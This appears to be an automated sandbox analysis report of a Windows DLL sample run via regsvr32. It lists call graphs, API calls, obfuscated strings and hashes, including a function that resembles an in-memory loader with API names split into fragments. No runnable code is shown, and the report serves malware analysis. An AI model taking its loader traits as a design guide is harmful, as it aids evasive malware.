7fef9d2bf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16279->16281 16280->16281 16282 7fef9d2bfde terminate 16281->16282 16285 7fef9d23280 16282->16285 16284 7fef9d2be2d GetCurrentProcess TerminateProcess 16284->16270 16286 7fef9d23289 16285->16286 16287 7fef9d23294 16286->16287 16288 7fef9d23720 RtlCaptureContext RtlLookupFunctionEntry 16286->16288 16287->16284 16289 7fef9d237a5 16288->16289 16290 7fef9d23764 RtlVirtualUnwind 16288->16290 16291 7fef9d237c7 IsDebuggerPresent 16289->16291 16290->16291 16296 7fef9d28d90 16291->16296 16293 7fef9d23826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16294 7fef9d2384e GetCurrentProcess TerminateProcess 16293->16294 16295 7fef9d23844 terminate 16293->16295 16294->16284 16295->16294 16296->16293 16297->16254 16299 7fef9d263f1 16298->16299 16300 7fef9d26447 16299->16300 16303 7fef9d26480 16299->16303 16301 7fef9d2bd70 _invalid_parameter 17 API calls 16300->16301 16302 7fef9d2647b 16301->16302 16302->16257 16305 7fef9d26504 16303->16305 16310 7fef9d29360 LeaveCriticalSection 16303->16310 16305->16257 16307 7fef9d26681 _CrtMemDumpAllObjectsSince 16306->16307 16311 7fef9d26850 16307->16311 16309 7fef9d26698 _LocaleUpdate::~_LocaleUpdate 16309->16258 16310->16302 16312 7fef9d26871 16311->16312 16313 7fef9d26ba6 16312->16313 16316 7fef9d268ed _CrtIsValidPointer 16312->16316 16341 7fef9d29360 LeaveCriticalSection 16313->16341 16315 7fef9d26bb0 16315->16309 16317 7fef9d2695e IsBadReadPtr 16316->16317 16318 7fef9d26976 16316->16318 16326 7fef9d2692f 16316->16326 16317->16318 16319 7fef9d26ad2 16318->16319 16320 7fef9d26a29 16318->16320 16323 7fef9d26b2d 16319->16323 16324 7fef9d26add 16319->16324 16321 7fef9d26abe 16320->16321 16322 7fef9d26a86 IsBadReadPtr 16320->16322 16329 7fef9d26bf0 16321->16329 16322->16321 16322->16326 16323->16326 16328 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16323->16328 16325 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16324->16325 16325->16326 16326->16309 16328->16326 16330 7fef9d26c28 16329->16330 16331 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 16330->16331 16333 7fef9d26c7a _CrtMemDumpAllObjectsSince 16330->16333 16332 7fef9d23280 __GSHandlerCheck 8 API calls 16331->16332 16334 7fef9d26e89 16332->16334 16336 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16333->16336 16342 7fef9d2c260 16333->16342 16334->16326 16346 7fef9d2c0c0 16336->16346 16338 7fef9d26e12 16338->16326 16339 7fef9d26dc7 16339->16338 16349 7fef9d26ea0 16339->16349 16341->16315 16343 7fef9d2c286 _CrtMemDumpAllObjectsSince wcsxfrm 16342->16343 16345 7fef9d2c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16343->16345 16353 7fef9d2f4d0 16343->16353 16345->16336 16364 7fef9d32260 16346->16364 16348 7fef9d2c103 16348->16339 16350 7fef9d26ebd 16349->16350 16352 7fef9d26ed1 16349->16352 16351 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16350->16351 16350->16352 16351->16352 16352->16338 16354 7fef9d2f4f9 _CrtMemDumpAllObjectsSince 16353->16354 16357 7fef9d2f570 16354->16357 16356 7fef9d2f550 _LocaleUpdate::~_LocaleUpdate 16356->16345 16358 7fef9d2f599 MultiByteToWideChar 16357->16358 16360 7fef9d2f604 _CrtMemDumpAllObjectsSince_stat 16358->16360 16361 7fef9d2f60b malloc _calloc_dbg_impl _MarkAllocaS 16358->16361 16360->16356 16361->16360 16362 7fef9d2f68b MultiByteToWideChar 16361->16362 16362->16360 16363 7fef9d2f6ca GetStringTypeW 16362->16363 16363->16360 16365 7fef9d3228b 16364->16365 16366 7fef9d322e1 16365->16366 16368 7fef9d3231f 16365->16368 16367 7fef9d2bd70 _invalid_parameter 17 API calls 16366->16367 16371 7fef9d32315 _calloc_dbg_impl 16367->16371 16369 7fef9d32385 16368->16369 16372 7fef9d323c3 _calloc_dbg_impl 16368->16372 16370 7fef9d2bd70 _invalid_parameter 17 API calls 16369->16370 16370->16371 16371->16348 16372->16371 16373 7fef9d2bd70 _invalid_parameter 17 API calls 16372->16373 16373->16371 16374->16264 16376 7fef9d274b2 GetProcAddress 16375->16376 16377 7fef9d274d1 ExitProcess 16375->16377 16376->16377 16381 7fef9d290be 16378->16381 16379 7fef9d290fd DeleteCriticalSection 16379->16381 16380 7fef9d234a0 16380->16217 16381->16379 16382 7fef9d2914d 16381->16382 16382->16380 16383 7fef9d29196 DeleteCriticalSection 16382->16383 16383->16382 16421 7fef9d28670 GetEnvironmentStringsW 16422 7fef9d28690 16421->16422 16423 7fef9d28697 WideCharToMultiByte 16421->16423 16425 7fef9d2875f FreeEnvironmentStringsW 16423->16425 16426 7fef9d28733 16423->16426 16425->16422 16426->16425 16427 7fef9d2876e WideCharToMultiByte 16426->16427 16428 7fef9d287c2 FreeEnvironmentStringsW 16427->16428 16429 7fef9d287aa 16427->16429 16428->16422 16429->16428 17330 7fef9d3e16f 17331 7fef9d3e17c _CrtMemDumpAllObjectsSince wcsxfrm get_int64_arg 17330->17331 17332 7fef9d3eadf 17331->17332 17342 7fef9d3da75 17331->17342 17353 7fef9d3eec0 17331->17353 17357 7fef9d3ef10 17332->17357 17335 7fef9d3eafd 17336 7fef9d3eb33 17335->17336 17340 7fef9d3eec0 25 API calls 17335->17340 17337 7fef9d3ec29 17336->17337 17351 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17336->17351 17338 7fef9d3ebda 17337->17338 17339 7fef9d3ef10 25 API calls 17337->17339 17338->17342 17344 7fef9d3eec0 25 API calls 17338->17344 17339->17338 17340->17336 17341 7fef9d3eca1 17343 7fef9d2bd70 _invalid_parameter 17 API calls 17341->17343 17345 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17341->17345 17342->17341 17347 7fef9d3dbb5 17342->17347 17343->17345 17344->17342 17346 7fef9d23280 __GSHandlerCheck 8 API calls 17345->17346 17348 7fef9d3ed9e 17346->17348 17350 7fef9d2bd70 _invalid_parameter 17 API calls 17347->17350 17350->17345 17351->17338 17361 7fef9d3f000 17351->17361 17368 7fef9d3ee40 17351->17368 17354 7fef9d3eed7 17353->17354 17355 7fef9d3ef07 17354->17355 17356 7fef9d3ee40 25 API calls 17354->17356 17355->17332 17356->17354 17358 7fef9d3ef2c 17357->17358 17359 7fef9d3ef4d 17358->17359 17360 7fef9d3ee40 25 API calls 17358->17360 17359->17335 17360->17358 17362 7fef9d3f026 _CrtMemDumpAllObjectsSince wcsxfrm 17361->17362 17364 7fef9d3f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 17361->17364 17363 7fef9d3f276 _CrtMemDumpAllObjectsSince 17362->17363 17362->17364 17365 7fef9d3f146 _CrtMemDumpAllObjectsSince 17362->17365 17366 7fef9d3f29d MultiByteToWideChar 17363->17366 17364->17351 17365->17364 17367 7fef9d3f1b5 MultiByteToWideChar 17365->17367 17366->17364 17367->17364 17369 7fef9d3ee62 17368->17369 17370 7fef9d3ee6e 17369->17370 17372 7fef9d3f360 17369->17372 17370->17351 17373 7fef9d3f719 17372->17373 17374 7fef9d3f399 17372->17374 17376 7fef9d40170 23 API calls 17373->17376 17407 7fef9d3f4f2 17373->17407 17375 7fef9d3afb0 _fflush_nolock 17 API calls 17374->17375 17377 7fef9d3f3a6 17375->17377 17376->17407 17379 7fef9d3f3ed 17377->17379 17381 7fef9d3afb0 _fflush_nolock 17 API calls 17377->17381 17378 7fef9d23280 __GSHandlerCheck 8 API calls 17380 7fef9d3f7c5 17378->17380 17382 7fef9d3f4c7 17379->17382 17384 7fef9d3afb0 _fflush_nolock 17 API calls 17379->17384 17380->17370 17383 7fef9d3f3b8 17381->17383 17385 7fef9d40170 23 API calls 17382->17385 17382->17407 17383->17379 17387 7fef9d3afb0 _fflush_nolock 17 API calls 17383->17387 17386 7fef9d3f43d 17384->17386 17385->17407 17388 7fef9d3f484 17386->17388 17390 7fef9d3afb0 _fflush_nolock 17 API calls 17386->17390 17389 7fef9d3f3ca 17387->17389 17388->17382 17393 7fef9d3f561 17388->17393 17391 7fef9d3afb0 _fflush_nolock 17 API calls 17389->17391 17392 7fef9d3f44f 17390->17392 17391->17379 17392->17388 17396 7fef9d3afb0 _fflush_nolock 17 API calls 17392->17396 17394 7fef9d3afb0 _fflush_nolock 17 API calls 17393->17394 17395 7fef9d3f56e 17394->17395 17397 7fef9d3f5b8 17395->17397 17399 7fef9d3afb0 _fflush_nolock 17 API calls 17395->17399 17398 7fef9d3f461 17396->17398 17397->17373 17402 7fef9d3f604 17397->17402 17400 7fef9d3afb0 _fflush_nolock 17 API calls 17398->17400 17401 7fef9d3f580 17399->17401 17400->17388 17401->17397 17404 7fef9d3afb0 _fflush_nolock 17 API calls 17401->17404 17403 7fef9d3b530 wctomb_s 19 API calls 17402->17403 17403->17407 17405 7fef9d3f592 17404->17405 17406 7fef9d3afb0 _fflush_nolock 17 API calls 17405->17406 17406->17397 17407->17378 18407 7fef9d41370 18408 7fef9d3af60 _unlock_file2 2 API calls 18407->18408 18409 7fef9d41390 18408->18409 16577 7fef9d28860 HeapCreate 16578 7fef9d28891 GetVersion 16577->16578 16579 7fef9d2888d 16577->16579 16580 7fef9d288c1 16578->16580 16581 7fef9d288a7 HeapSetInformation 16578->16581 16580->16579 16581->16580 18410 7fef9d31b64 18411 7fef9d31b9d 18410->18411 18412 7fef9d3ab10 17 API calls 18411->18412 18413 7fef9d31c86 18411->18413 18415 7fef9d31bed 18411->18415 18412->18413 18414 7fef9d39290 23 API calls 18413->18414 18413->18415 18414->18415 18842 7fef9d35260 18843 7fef9d35296 __SehTransFilter _CreateFrameInfo 18842->18843 18844 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18843->18844 18845 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18844->18845 17408 7fef9d41160 17411 7fef9d34e90 17408->17411 17410 7fef9d41179 17412 7fef9d34ebb 17411->17412 17413 7fef9d34ecf 17411->17413 17412->17413 17414 7fef9d2cf50 terminate 35 API calls 17412->17414 17413->17410 17414->17413 18423 7fef9d3bb66 18424 7fef9d3bb78 _CrtMemDumpAllObjectsSince wcsxfrm 18423->18424 18425 7fef9d3bc46 18424->18425 18427 7fef9d3b99c 18424->18427 18426 7fef9d2bd70 _invalid_parameter 17 API calls 18425->18426 18430 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18426->18430 18428 7fef9d3cc93 18427->18428 18432 7fef9d3bada 18427->18432 18429 7fef9d2bd70 _invalid_parameter 17 API calls 18428->18429 18428->18430 18429->18430 18431 7fef9d23280 __GSHandlerCheck 8 API calls 18430->18431 18433 7fef9d3cd90 18431->18433 18434 7fef9d2bd70 _invalid_parameter 17 API calls 18432->18434 18434->18430

                                                      Executed Functions

                                                      Function 000007FEF9D212B0 Relevance: 210.9, APIs: 6, Strings: 114, Instructions: 872memorywindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                                      • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                      • API String ID: 2181984824-2032897877
                                                      • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                      • Instruction ID: 1e3beb4b4c43f569e156fbbbb3a48c6786d138466eab30fa5612b4063b7ac052
                                                      • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                      • Instruction Fuzzy Hash: 72E2C9B690A7C18FE3748F629E857DD3AA0F345748F609208D3991FA1DCB795242CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00140000 Relevance: 74.6, APIs: 4, Strings: 38, Instructions: 1094memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 15 140000-140460 call 140aa8 * 2 VirtualAlloc 37 140462-140466 15->37 38 14048a-140494 15->38 39 140468-140488 37->39 41 140a91-140aa6 38->41 42 14049a-14049e 38->42 39->38 39->39 42->41 43 1404a4-1404a8 42->43 43->41 44 1404ae-1404b2 43->44 44->41 45 1404b8-1404bf 44->45 45->41 46 1404c5-1404d2 45->46 46->41 47 1404d8-1404e1 46->47 47->41 48 1404e7-1404f4 47->48 48->41 49 1404fa-140507 48->49 50 140531-140567 GetNativeSystemInfo 49->50 51 140509-140511 49->51 50->41 53 14056d-140589 VirtualAlloc 50->53 52 140513-140518 51->52 54 140521 52->54 55 14051a-14051f 52->55 56 1405a0-1405ac 53->56 57 14058b-14059e 53->57 59 140523-14052f 54->59 55->59 58 1405af-1405b2 56->58 57->56 61 1405b4-1405bf 58->61 62 1405c1-1405db 58->62 59->50 59->52 61->58 63 1405dd-1405e2 62->63 64 14061b-140622 62->64 65 1405e4-1405ea 63->65 66 140628-14062f 64->66 67 1406db-1406e2 64->67 68 1405ec-140609 65->68 69 14060b-140619 65->69 66->67 70 140635-140642 66->70 71 140864-14086b 67->71 72 1406e8-1406f9 67->72 68->68 68->69 69->64 69->65 70->67 75 140648-14064f 70->75 73 140917-140929 71->73 74 140871-14087f 71->74 76 140702-140705 72->76 79 140a07-140a1a 73->79 80 14092f-140937 73->80 81 14090e-140911 74->81 82 140654-140658 75->82 77 140707-14070a 76->77 78 1406fb-1406ff 76->78 83 14070c-14071d 77->83 84 140788-14078e 77->84 78->76 99 140a40-140a4a 79->99 100 140a1c-140a27 79->100 86 14093b-14093f 80->86 81->73 85 140884-1408a9 81->85 87 1406c0-1406ca 82->87 88 140794-1407a2 83->88 89 14071f-140720 83->89 84->88 117 140907-14090c 85->117 118 1408ab-1408b1 85->118 93 140945-14095a 86->93 94 1409ec-1409fa 86->94 91 1406cc-1406d2 87->91 92 14065a-140669 87->92 101 14085d-14085e 88->101 102 1407a8 88->102 98 140722-140784 89->98 91->82 103 1406d4-1406d5 91->103 95 14067a-14067e 92->95 96 14066b-140678 92->96 105 14095c-14095e 93->105 106 14097b-14097d 93->106 94->86 97 140a00-140a01 94->97 108 140680-14068a 95->108 109 14068c-140690 95->109 107 1406bd-1406be 96->107 97->79 98->98 112 140786 98->112 115 140a4c-140a54 99->115 116 140a7b-140a8e 99->116 113 140a38-140a3e 100->113 101->71 114 1407ae-1407d4 102->114 103->67 119 140960-14096c 105->119 120 14096e-140979 105->120 110 1409a2-1409a4 106->110 111 14097f-140981 106->111 107->87 122 1406b6-1406ba 108->122 125 1406a5-1406a9 109->125 126 140692-1406a3 109->126 127 1409a6-1409aa 110->127 128 1409ac-1409bb 110->128 123 140983-140987 111->123 124 140989-14098b 111->124 112->88 113->99 131 140a29-140a35 113->131 146 140835-140839 114->146 147 1407d6-1407d9 114->147 115->116 132 140a56-140a78 115->132 116->41 117->81 129 1408b3-1408b9 118->129 130 1408bb-1408c8 118->130 121 1409be-1409bf 119->121 120->121 135 1409c5-1409cb 121->135 122->107 123->121 124->110 133 14098d-14098f 124->133 125->107 134 1406ab-1406b3 125->134 126->122 127->121 128->121 136 1408ea-1408fe 129->136 137 1408d3-1408e5 130->137 138 1408ca-1408d1 130->138 131->113 132->116 141 140991-140997 133->141 142 140999-1409a0 133->142 134->122 143 1409cd-1409d3 135->143 144 1409d9-1409e9 VirtualProtect 135->144 136->117 154 140900-140905 136->154 137->136 138->137 138->138 141->121 142->135 143->144 144->94 148 140844-140850 146->148 149 14083b 146->149 151 1407e3-1407f0 147->151 152 1407db-1407e1 147->152 148->114 153 140856-140857 148->153 149->148 156 1407f2-1407f9 151->156 157 1407fb-14080d 151->157 155 140812-14082c 152->155 153->101 154->118 155->146 159 14082e-140833 155->159 156->156 156->157 157->155 159->147
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.935681407.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Offset: 00140000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_140000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                      • API String ID: 2313188843-2517549848
                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                      • Instruction ID: d533c7888e8ad47428c32e48e704199737e10f3c0956cb83534593ac496a38be
                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                      • Instruction Fuzzy Hash: 6E72D530618B488BDB29DF19C8856B9B7E1FB98305F10462DE9CFC7211DB34D986CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180005C74 Relevance: 6.6, Strings: 5, Instructions: 307COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $E$&C$b $z_o^$]o-
                                                      • API String ID: 0-182765021
                                                      • Opcode ID: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                      • Instruction ID: b82cae2a5c5b3167ef3d8ad315f999371e1e8449cd72bf967428ee4211bfb190
                                                      • Opcode Fuzzy Hash: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                      • Instruction Fuzzy Hash: 5CE1277151468CDFDF88DF28C889ADD3BA1FB483A8F956219FD0A97250D774D888CB84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000359C Relevance: 6.5, Strings: 5, Instructions: 235COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$?I $k?@`${>K$s
                                                      • API String ID: 0-923624899
                                                      • Opcode ID: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                      • Instruction ID: ebffd08f5432af4d9268e2276ec0df8890e8c351c8fd12e1d0a52c84a5ba0a07
                                                      • Opcode Fuzzy Hash: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                      • Instruction Fuzzy Hash: F4C1F070519784ABC388DF24C4CA95BBBF1FBD4758F906A1CF9C68A260D774D948CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000E99C Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 394 18000e99c-18000e9ca 395 18000e9cc 394->395 396 18000e9ce-18000e9d4 395->396 397 18000e9da-18000e9e0 396->397 398 18000ee1d-18000f007 call 1800138d0 call 180028908 396->398 399 18000ee13-18000ee18 397->399 400 18000e9e6-18000e9ec 397->400 416 18000f009 398->416 417 18000f00e-18000f202 call 180028908 call 180017d54 398->417 399->396 402 18000e9f2-18000e9f8 400->402 403 18000ea99-18000eaa6 400->403 405 18000f20d-18000f213 402->405 406 18000e9fe-18000ea89 call 180028724 402->406 408 18000eaa8-18000eaae 403->408 409 18000eab0-18000ead3 403->409 405->396 411 18000f219-18000f226 405->411 406->411 420 18000ea8f-18000ea94 406->420 410 18000ead9-18000edf1 call 180001000 call 180028908 call 180017d54 408->410 409->410 428 18000edf6-18000edfe 410->428 416->417 417->395 427 18000f208 417->427 420->396 427->405 428->411 429 18000ee04-18000ee0e 428->429 429->396
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &k8$,8$\$`/U
                                                      • API String ID: 0-956392518
                                                      • Opcode ID: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                      • Instruction ID: eb6f1617cd975c6e10cf27e40abea16f203efbb492656816d2660eb5cb9ff966
                                                      • Opcode Fuzzy Hash: 342d408fbb0085f8b5c961c7b7314e28d99ae80dc1fdc32ae007dfb548a83613
                                                      • Instruction Fuzzy Hash: 7D2215715093C88BDBBECF64C889BDA7BB9FB44708F10561CEA4A9E258DB745748CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D28860 Relevance: 4.5, APIs: 3, Instructions: 25memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 430 7fef9d28860-7fef9d2888b HeapCreate 431 7fef9d28891-7fef9d288a5 GetVersion 430->431 432 7fef9d2888d-7fef9d2888f 430->432 434 7fef9d288c1 431->434 435 7fef9d288a7-7fef9d288bb HeapSetInformation 431->435 433 7fef9d288c6-7fef9d288ca 432->433 434->433 435->434
                                                      APIs
                                                      • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28876
                                                      • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28891
                                                      • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D288BB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Heap$CreateInformationVersion
                                                      • String ID:
                                                      • API String ID: 3563531100-0
                                                      • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                      • Instruction ID: 9235811b63a60011062a1442a231d54292fe2d432e51c42db702af6c27d11e97
                                                      • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                                      • Instruction Fuzzy Hash: 50F0FE74A18A4282F7949729AC0977E63D0B758345FA1C43696CD826B4DF3F9589C601
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180025A4C Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 436 180025a4c-180025a83 437 180025a85-180025a8a 436->437 438 180025f34-180025f39 call 180016da8 437->438 439 180025a90-180025a95 437->439 448 180025f3e-180025f43 438->448 441 180025a9b-180025aa0 439->441 442 180025e5e-180025f2f call 180029374 439->442 444 180025e35-180025e53 441->444 445 180025aa6-180025aab 441->445 442->437 444->442 449 180025ab1-180025ab6 445->449 450 180025cff-180025e1c call 180001000 445->450 451 180025f49 448->451 452 180026060-18002606d 448->452 454 180025abc-180025ac1 449->454 455 180025cf0-180025cfa 449->455 456 180025e21-180025e30 450->456 451->437 457 180025c24-180025ce1 call 18001958c 454->457 458 180025ac7-180025acc 454->458 455->437 456->437 463 180025ce6-180025ceb 457->463 460 180025ad2-180025ad7 458->460 461 180025f4e-18002605a call 180028724 call 18001c064 458->461 460->448 462 180025add-180025bf1 call 180020048 460->462 461->452 467 180025bf6-180025bfc 462->467 463->437 469 180025c1a-180025c1f 467->469 470 180025bfe-180025c15 467->470 469->437 470->437
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6"*n$US8$z:7
                                                      • API String ID: 0-1851205513
                                                      • Opcode ID: 1606357dec85794d189ee26d92c7f71c49412cbd8f38d505c9803facb48510e7
                                                      • Instruction ID: 607295142d9547307d046de48b3748fa472aee76cf77032a28cf9f5936a2d7e5
                                                      • Opcode Fuzzy Hash: 1606357dec85794d189ee26d92c7f71c49412cbd8f38d505c9803facb48510e7
                                                      • Instruction Fuzzy Hash: 57E1F9706057889FEBBADF24C88A7DE7BA1FB49744F50422DDC8A8E250DB745648CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180020118 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 472 180020118-180020142 473 180020147-18002014c 472->473 474 180020152-180020157 473->474 475 180020380-1800203f5 call 1800075b8 473->475 476 180020358-180020366 474->476 477 18002015d-180020162 474->477 488 180020401 475->488 489 1800203f7-1800203fc 475->489 479 18002036c-180020370 476->479 480 180020412-180020484 call 18001958c 477->480 481 180020168-18002016d 477->481 486 180020372-18002037b 479->486 487 180020368-180020369 479->487 491 180020489-180020495 480->491 484 180020173-180020178 481->484 485 18002034e-180020353 481->485 492 1800202c8-180020349 call 18001958c 484->492 493 18002017e-180020183 484->493 485->473 486->473 487->479 490 180020406-18002040b 488->490 489->473 490->491 494 18002040d 490->494 492->473 496 180020189-18002018e 493->496 497 18002021d-1800202ad call 180020048 493->497 494->473 496->490 500 180020194-180020218 call 1800011f4 496->500 501 1800202b2-1800202b8 497->501 500->473 501->491 503 1800202be-1800202c3 501->503 503->473
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -;$-;$00
                                                      • API String ID: 0-2539125404
                                                      • Opcode ID: affc7f65c819fab80511788a3c6ad3e3eeb13df79fc80a7c79ea60dae88b3546
                                                      • Instruction ID: 193f60ccd2842279d11af0df6a42cb9b90b2b7ab7c379db6368ea7840d008f1f
                                                      • Opcode Fuzzy Hash: affc7f65c819fab80511788a3c6ad3e3eeb13df79fc80a7c79ea60dae88b3546
